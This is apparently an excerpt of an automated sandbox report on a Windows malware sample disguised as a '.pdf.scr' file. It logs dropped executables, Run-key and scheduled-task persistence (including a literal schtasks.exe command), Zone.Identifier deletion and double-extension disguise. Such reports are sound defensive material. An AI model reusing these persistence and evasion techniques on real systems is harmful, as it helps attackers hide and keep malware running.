      Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeFile created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeFile created: C:\Users\user\AppData\Local\Temp\RegSvcs.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeJump to dropped file

      Boot Survival

      barindex
      Creates multiple autostart registry keys
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdateJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ChromeJump to behavior
      Creates autostart registry keys with suspicious values (likely registry only malware)
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbsJump to behavior
      Uses schtasks.exe or at.exe to add and modify task schedules
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmp
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ChromeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ChromeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdateJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdateJump to behavior

      Hooking and other Techniques for Hiding and Protection

      barindex
      Hides that the sample has been downloaded from the Internet (zone.identifier)
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Temp\RegSvcs.exe:Zone.Identifier read attributes | deleteJump to behavior
      Uses an obfuscated file name to hide its real file extension (double extension)
      Source: Possible double extension: pdf.scrStatic PE information: 026910003102350.pdf.scr.exe
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_003A25A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_003A25A0
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0032FC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_0032FC8A
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
